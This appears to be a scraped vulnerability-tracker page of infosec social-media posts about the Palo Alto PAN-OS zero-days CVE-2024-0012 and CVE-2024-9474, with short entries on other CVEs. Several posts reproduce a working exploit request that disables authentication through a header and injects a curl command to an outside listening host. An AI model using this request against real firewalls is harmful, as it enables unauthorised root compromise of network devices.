Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

labs.watchtowr.com/pots-and-pa

#CVE20240012 #CVE20249474 #CVE #CVE2024

##

jos1264@social.skynetcloud.site at 2024-11-18T17:20:03.000Z ##

Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited thecyberexpress.com/palo-alto- #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS

##

screaminggoat at 2024-11-19T15:48:04.095Z ##

watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.

##

threatcodex at 2024-11-19T14:28:46.687Z ##

Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474

labs.watchtowr.com/pots-and-pa

##

screaminggoat at 2024-11-18T19:18:33.674Z ##

CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!

  • CVE-2024-0012 (CVSSv4: 9.3 critical) Palo Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
  • CVE-2024-9474 (CVSSv4: 6.9 medium) Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
  • CVE-2024-1212 (perfect 10.0 🥳) Progress Kemp LoadMaster OS Command Injection Vulnerability

##

screaminggoat at 2024-11-18T15:31:42.026Z ##

Unit 42: ⁠Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.

h/t: @cR0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares

##

screaminggoat at 2024-11-18T14:29:10.181Z ##

Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)

The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474

Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.

New Indicators of compromise at Unit 42: unit42.paloaltonetworks.com/cv

##

screaminggoat@infosec.exchange at 2024-11-19T15:48:04.000Z ##

watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.

#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity

##

screaminggoat@infosec.exchange at 2024-11-18T19:18:33.000Z ##

CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!

  • CVE-2024-0012 (CVSSv4: 9.3 critical) Palo Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
  • CVE-2024-9474 (CVSSv4: 6.9 medium) Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
  • CVE-2024-1212 (perfect 10.0 🥳) Progress Kemp LoadMaster OS Command Injection Vulnerability

#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster

##

screaminggoat@infosec.exchange at 2024-11-18T15:31:42.000Z ##

Unit 42: ⁠Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.

h/t: cr0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares

#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC

##

screaminggoat@infosec.exchange at 2024-11-18T14:29:10.000Z ##

Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)

The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474

Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.

New Indicators of compromise at Unit 42: unit42.paloaltonetworks.com/cv

#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC

##

oots at 2024-11-19T20:32:29.395Z ##

How to hack a firewall:

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

labs.watchtowr.com/pots-and-pa

##

jos1264@social.skynetcloud.site at 2024-11-18T17:20:03.000Z ##

Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited thecyberexpress.com/palo-alto- #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS

##

oots@infosec.exchange at 2024-11-19T20:32:29.000Z ##

How to hack a #PaloAlto firewall:

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

labs.watchtowr.com/pots-and-pa

#CVE20240012 #CVE20249474 #CVE #CVE2024

##

jos1264@social.skynetcloud.site at 2024-11-18T17:20:03.000Z ##

Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited thecyberexpress.com/palo-alto- #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS

##

screaminggoat at 2024-11-19T15:48:04.095Z ##

watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.

##

threatcodex at 2024-11-19T14:28:46.687Z ##

Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474

labs.watchtowr.com/pots-and-pa

##

screaminggoat at 2024-11-18T19:18:33.674Z ##

CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!

  • CVE-2024-0012 (CVSSv4: 9.3 critical) Palo Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
  • CVE-2024-9474 (CVSSv4: 6.9 medium) Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
  • CVE-2024-1212 (perfect 10.0 🥳) Progress Kemp LoadMaster OS Command Injection Vulnerability

##

screaminggoat at 2024-11-18T15:31:42.026Z ##

Unit 42: ⁠Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.

h/t: @cR0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares

##

screaminggoat at 2024-11-18T14:29:10.181Z ##

Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)

The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474

Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.

New Indicators of compromise at Unit 42: unit42.paloaltonetworks.com/cv

##

screaminggoat@infosec.exchange at 2024-11-19T15:48:04.000Z ##

watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.

#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity

##

screaminggoat@infosec.exchange at 2024-11-18T19:18:33.000Z ##

CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!

  • CVE-2024-0012 (CVSSv4: 9.3 critical) Palo Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
  • CVE-2024-9474 (CVSSv4: 6.9 medium) Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
  • CVE-2024-1212 (perfect 10.0 🥳) Progress Kemp LoadMaster OS Command Injection Vulnerability

#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster

##

screaminggoat@infosec.exchange at 2024-11-18T15:31:42.000Z ##

Unit 42: ⁠Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.

h/t: cr0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares

#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC

##

screaminggoat@infosec.exchange at 2024-11-18T14:29:10.000Z ##

Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)

The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474

Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.

New Indicators of compromise at Unit 42: unit42.paloaltonetworks.com/cv

#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC

##

AAKL@infosec.exchange at 2024-11-20T16:16:25.000Z ##

#PaloAlto Unit 42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 unit42.paloaltonetworks.com/cv #cybersecurity #Infosec

##

chris@mas.todon.rocks at 2024-11-20T08:27:11.000Z ##

r u freakin' kidding me? "X-PAN-AUTHCHECK: off" - seriously?!

labs.watchtowr.com/pots-and-pa

##

iagox86@infosec.exchange at 2024-11-19T18:22:11.000Z ##

Favorite quote from WatchTowr's blog about PAN-OS vuln:

I guess auto_prepend_file actually has legitimate use besides writing PHP exploits.

labs.watchtowr.com/pots-and-pa

##

mttaggart@infosec.exchange at 2024-11-19T16:13:30.000Z ##

Reading the awesome WatchTowr writeup of CVE-2024-0012 and CVE-2024-9474, the Palo Alto RCE/privesc one-two punch. Great work here as always. And h/t to @screaminggoat , of course.

labs.watchtowr.com/pots-and-pa

A few things stand out:

First, sorry @cR0w, no #directorytraversalmemes for you:

We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?! At this point, why is anyone surprised?

That’s right folks, a simple reproducer for CVE-2024-0012. It couldn't be easier than that.

That's the auth bypass. And then, WHAT IS THIS DOING IN ANYTHING

return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username");

So obviously if that $username has shell metacharacters, you have yourself a nice command injection.

And guess what user the service runs as?

##

AAKL@infosec.exchange at 2024-11-19T15:17:42.000Z ##

WatchTower: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 labs.watchtowr.com/pots-and-pa #cybersecurity #infosec #PaloAlto

##

AAKL@infosec.exchange at 2024-11-19T14:00:31.000Z ##

If you missed this, #PaloAlto has patched a Firewall Zero-Day Exploited in Operation Lunar Peek securityweek.com/palo-alto-pat @SecurityWeek @ekovacs

More:

Palo Alto Unit 42 posted this yesterday about Lunar Peek activity related to CVE-2024-0012: unit42.paloaltonetworks.com/cv

##

ljrk@todon.eu at 2024-11-19T11:30:19.000Z ##

@christopherkunz Palo Alto keeps on giving.

labs.watchtowr.com/pots-and-pa

##

GossiTheDog@cyberplace.social at 2024-11-19T11:07:22.000Z ##

Weeeeeee

I don’t know why Palo-Alto changed the CVEs at the last minute to remove reference to RCE. It’s remote code execution. labs.watchtowr.com/pots-and-pa

##

_r_netsec@infosec.exchange at 2024-11-19T09:43:06.000Z ##

Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 - watchTowr Labs labs.watchtowr.com/pots-and-pa

##

oversecurity@mastodon.social at 2024-11-19T09:10:08.000Z ##

CISA Adds Three Critical Vulnerabilities to the Known Exploited Vulnerabilities Catalog

CISA adds CVE-2024-1212, CVE-2024-0012, and CVE-2024-9474 to the Known Exploited Vulnerabilities Catalog (KEV).

🔗️ [Cyble] link.is.it/so5jib

##

screaminggoat@infosec.exchange at 2024-11-18T22:03:01.000Z ##

@catc0n I noticed the disparity between the CVE-2024-9474 advisory description "privilege escalation vulnerability" and CISA's KEV Catalog name "Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability"

Palo Alto Networks discarded the verbiage from Thursday "unauthenticated remote command execution vulnerability" and divided the unauth RCE into 2 separate vulnerabilities, while stating that one would allow for the other.

So authentication bypass to admin (CVE-2024-0012), then authenticated privesc from admin to root (CVE-2024-9474).

Unit 42 skipped talking about CVE-2024-9474.

The CVSSv4 vector is CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:A/AU:N/R:U/V:C/RE:H/U:Red. I think the real takeaway is that only Integrity is impacted. Everything else appears to be the consequence of having root privileges on a firewall.

##

screaminggoat@infosec.exchange at 2024-11-18T21:03:07.000Z ##

@shadowserver IOCs provided by Unit 42: unit42.paloaltonetworks.com/cv

CVEs were added to CISA's KEV Catalog: cisa.gov/news-events/alerts/20

##

AAKL@infosec.exchange at 2024-11-18T20:25:29.000Z ##

#CISA has updated the KEV catalogue:

- CVE-2024-1212: Progress Kemp LoadMaster OS Command Injection Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-0012: Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-9474: Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability cve.org/CVERecord?id=CVE-2024- @cisacyber #cybersecurity #infosec #PaloAlto

##

cisakevtracker@mastodon.social at 2024-11-18T20:00:50.000Z ##

CVE ID: CVE-2024-9474
Vendor: Palo Alto Networks
Product: PAN-OS
Date Added: 2024-11-18
Vulnerability: Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
Notes: security.paloaltonetworks.com/ ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

AAKL@infosec.exchange at 2024-11-18T16:27:18.000Z ##

#PaloAlto has updated its security advisories: security.paloaltonetworks.com/

- CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface security.paloaltonetworks.com/

- CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface @paloaltontwks #cybersecurity #infosec

##

jos1264@social.skynetcloud.site at 2024-11-18T16:20:02.000Z ##

Attackers are exploiting 2 zero-days in Palo Alto Networks firewalls (CVE-2024-0012, CVE-2024-9474) helpnetsecurity.com/2024/11/18 #PaloAltoNetworks #enterprise #Don'tmiss #Hotstuff #firewall #0-day #News #CVE

##

zeljkazorz@infosec.exchange at 2024-11-18T16:06:38.000Z ##

Palo Alto Networks has released fixes for two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in its next-generation firewalls that have been exploited by attackers as zero-days.

CVE-2024-0012 is the (previously unspecified) unauthenticated remote command execution zero-day that the company started warning about ten days ago.

helpnetsecurity.com/2024/11/18

#CVE #Cybersecurity

##

cR0w@infosec.exchange at 2024-11-18T15:30:09.000Z ##

@screaminggoat "Palo Alto Networks and Unit 42 are engaged in tracking a limited set of exploitation activity related to CVE-2024-0012 and are working with external researchers, partners, and customers to share information transparently and rapidly." 🤔

unit42.paloaltonetworks.com/cv

##

AAKL@infosec.exchange at 2024-11-18T15:12:39.000Z ##

Palo Alto Unit42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 unit42.paloaltonetworks.com/cv @unit42_intel #cybersecurity #infosec

##

screaminggoat@infosec.exchange at 2024-11-18T14:57:27.000Z ##

@neurovagrant start your Monday off with exploited zero-days:

##

screaminggoat@infosec.exchange at 2024-11-18T14:49:21.000Z ##

@therecord_media @jwarminsky @jgreig can this news article be updated to include the two CVE IDs?: CVE-2024-0012 and CVE-2024-9474

##

CVE-2024-11159
(4.3 MEDIUM)

EPSS: 0.05%

updated 2024-11-19T14:56:37.800000

2 posts

Using remote content in OpenPGP encrypted messages can lead to the disclosure of plaintext. This vulnerability affects Thunderbird < 128.4.3 and Thunderbird < 132.0.1.

wilhelm@fedia.social at 2024-11-14T11:07:56.460Z ##

#Thunderbird casually fixing a high security vulnerability in their #OpenPGP implementation

#CVE-2024-11159 Using remote content in OpenPGP encrypted messages can lead to the disclosure of plaintext.

www.mozilla.org/en-US/security/advisories/mfsa2024-61/

##

screaminggoat@infosec.exchange at 2024-11-13T15:18:38.000Z ##

Mozilla Foundation security advisories:

  • 2024-61 Security Vulnerabilities fixed in Thunderbird 128.4.3 CVE-2024-11159 (high) Potential disclosure of plaintext in OpenPGP encrypted message
  • 2024-62 Security Vulnerabilities fixed in Thunderbird 132.0.1 CVE-2024-11159 (high) Potential disclosure of plaintext in OpenPGP encrypted message

No mention of exploitation

#mozilla #thunderbird #vulnerability #CVE #infosec #cybersecurity

##

CVE-2024-48510
(9.8 CRITICAL)

EPSS: 0.06%

updated 2024-11-18T23:41:15

3 posts

Directory Traversal vulnerability in DotNetZip v.1.16.0 and before allows a remote attacker to execute arbitrary code via the src/Zip.Shared/ZipEntry.Extract.cs component

swapgs@infosec.exchange at 2024-11-19T10:43:27.000Z ##

Finally got to publish the CVE for a "forever-day" path traversal in the .NET library DotNetZip affecting all releases since 2018. Enjoy, the PoC is in the patch! :blobcatsuit: #CVE_2024_48510

cve.org/CVERecord?id=CVE-2024-

##

cR0w@infosec.exchange at 2024-11-14T16:11:06.000Z ##

nvd.nist.gov/vuln/detail/CVE-2

#directoryTraversalMemes

##

CVE-2024-49019
(7.8 HIGH)

EPSS: 0.05%

updated 2024-11-18T21:12:46.067000

3 posts

Active Directory Certificate Services Elevation of Privilege Vulnerability

screaminggoat@infosec.exchange at 2024-11-12T23:03:30.000Z ##

TrustedSec: EKUwu: Not just another AD CS ESC
The publicly disclosed zero-day CVE-2024-49019 (7.8 high) Active Directory Certificate Services Elevation of Privilege Vulnerability appears to be the one mentioned in the 08 October 2024 blog post by TrustedSec. Dubbed "EKUwu," it lets an attacker craft a certificate signing request (CSR), using built-in default version 1 certificate templates, to include application policies that are preferred over the configured Extended Key Usage attributes specified in the template. The only requirement is enrollment rights, and it can be used to generate client authentication, certificate request agent, and codesigning certificates using the WebServer template.

According to the timeline, TrustedSec reported the vulnerability on 30 August and Microsoft Security Response Center responded on 28 September saying that "the default configuration was not vulnerable" but requested that they "hold off on publishing any details." UwU what's this? Cue the 08 October blog post disclosing the vulnerability and details.

h/t: @dreadpir8robots cc: @cR0w

#CVE_2024_49019 #zeroday #microsoft #EKUwu #cve #vulnerability

##

cR0w@infosec.exchange at 2024-11-12T21:35:30.000Z ##

Ref: msrc.microsoft.com/update-guid

##

screaminggoat@infosec.exchange at 2024-11-12T17:59:09.000Z ##

Happy #PatchTuesday from Microsoft: FOUR ZERO-DAYS (3 publicly disclosed, 2 actively exploited) 89 vulnerabilities

  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability (EXPLOITED, PUBLICLY DISCLOSED)
  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability (EXPLOITED)
  • CVE-2024-49019 (7.8 high) Active Directory Certificate Services Elevation of Privilege Vulnerability (PUBLICLY DISCLOSED)
  • CVE-2024-49040 (7.5 high) Microsoft Exchange Server Spoofing Vulnerability (PUBLICLY DISCLOSED)

#zeroday #vulnerability #microsoft #cve #eitw #activeexploitation #infosec #cybersecurity

##

CVE-2024-52940
(7.5 HIGH)

EPSS: 0.04%

updated 2024-11-18T18:32:00

1 posts

AnyDesk through 8.1.0 on Windows, when Allow Direct Connections is enabled, inadvertently exposes a public IP address within network traffic. The attacker must know the victim's AnyDesk ID.

1 repos

CVE-2023-0657
(3.4 LOW)

EPSS: 0.04%

updated 2024-11-18T17:11:17.393000

4 posts

A flaw was found in Keycloak. This issue occurs due to improperly enforcing token types when validating signatures locally. This could allow an authenticated attacker to exchange a logout token for an access token and possibly gain access to data outside of enforced permissions.

CVE-2023-1419
(5.9 MEDIUM)

EPSS: 0.09%

updated 2024-11-18T17:11:17.393000

4 posts

A script injection vulnerability was found in the Debezium database connector, where it does not properly sanitize some parameters. This flaw allows an attacker to send a malicious request to inject a parameter that may allow the viewing of unauthorized data.

CVE-2023-4639
(7.4 HIGH)

EPSS: 0.10%

updated 2024-11-18T17:11:17.393000

4 posts

A flaw was found in Undertow, which incorrectly parses cookies with certain value-delimiting characters in incoming requests. This issue could allow an attacker to construct a cookie value to exfiltrate HttpOnly cookie values or spoof arbitrary additional cookie values, leading to unauthorized data access or modification. The main threat from this flaw impacts data confidentiality and integrity.

CVE-2023-6110
(5.5 MEDIUM)

EPSS: 0.08%

updated 2024-11-18T17:11:17.393000

4 posts

A flaw was found in OpenStack. When a user tries to delete a non-existing access rule in it's scope, it deletes other existing access rules which are not associated with any application credentials.

CVE-2023-43091
(9.8 CRITICAL)

EPSS: 0.04%

updated 2024-11-17T15:30:52

4 posts

A flaw was found in GNOME Maps, which is vulnerable to a code injection attack via its service.json configuration file. If the configuration file is malicious, it may execute arbitrary code.

CVE-2020-25720
(7.5 HIGH)

EPSS: 0.05%

updated 2024-11-17T12:30:36

4 posts

A vulnerability was found in Samba where a delegated administrator with permission to create objects in Active Directory can write to all attributes of the newly created object, including security-sensitive attributes, even after the object's creation. This issue occurs because the administrator owns the object due to the lack of an Access Control List (ACL) at the time of creation and later being

CVE-2024-49060
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-15T21:30:53

2 posts

Azure Stack HCI Elevation of Privilege Vulnerability

AAKL@infosec.exchange at 2024-11-16T16:06:54.000Z ##

This was added to #Microsoft's advisories yesterday:

Security vulnerability for Arc VMs running on #Azure Stack HCI, version 23H2 github.com/Azure/AzureStackHCI #cybersecurity #Infosec

##

screaminggoat@infosec.exchange at 2024-11-15T22:47:51.000Z ##

Microsoft Security Response Center (MSRC): CVE-2024-49060
Leave it to Microsoft to drop an out-of-band vulnerability outside of Patch Tuesday. CVE-2024-49060 (8.8 high) Azure Stack HCI Elevation of Privilege Vulnerability. Not Exploited, not Publicly disclosed, Exploitation More Likely. Read the FAQ for explanation of AV:L and S:C.

#microsoft #vulnerability #cve #infosec #cybersecurity #azure

##

CVE-2024-50986
(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-15T15:31:04

1 posts

An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file.

1 repos

https://github.com/riftsandroses/CVE-2024-50986

CVE-2024-9465
(9.1 CRITICAL)

EPSS: 94.95%

updated 2024-11-15T14:39:34.863000

10 posts

An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.

Nuclei template

2 repos

https://github.com/mustafaakalin/CVE-2024-9465

https://github.com/horizon3ai/CVE-2024-9465

jos1264@social.skynetcloud.site at 2024-11-18T07:40:01.000Z ##

CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog cyble.com/blog/cisa-adds-two-c #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA

##

screaminggoat@infosec.exchange at 2024-11-14T19:30:12.000Z ##

CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Not quite hot, but I was stuck in meetings. CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

  • CVE-2024-9463 (9.9 critical) Palo Alto Networks Expedition OS Command Injection Vulnerability
  • CVE-2024-9465 (9.2 critical) Palo Alto Networks Expedition SQL Injection Vulnerability

#cisa #cisakev #vulnerability #kev #knownexploitedvulnerabilitiescatalog #CVE_2024_9463 #CVE_2024_9465 #cve #paloaltonetworks #pan #infosec #cybersecurity

##

oversecurity@mastodon.social at 2024-11-18T07:40:10.000Z ##

CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog

CISA has added CVE-2024-9463 and CVE-2024-9465 to its KEV catalog. These critical vulnerabilities in Palo Alto Networks Expedition are actively...

🔗️ [Cyble] link.is.it/qfqgxi

##

jos1264@social.skynetcloud.site at 2024-11-15T11:40:04.000Z ##

Palo Alto Networks firewalls, Expedition under attack (CVE-2024-9463, CVE-2024-9465) helpnetsecurity.com/2024/11/15 #configurationmanagement #PaloAltoNetworks #Horizon3.ai #enterprise #Don'tmiss #Hotstuff #firewall #Censys #News #CISA

##

rogeragrimes@infosec.exchange at 2024-11-14T21:47:24.000Z ##

Another SQL injection vuln. Not the last. Why? Well, part of the prob is we don't teach secure coding in most programming curriculums and companies hiring programmers don't require that programmers have secure coding skills. Time to maybe do these things?

cve.org/CVERecord?id=CVE-2024-

##

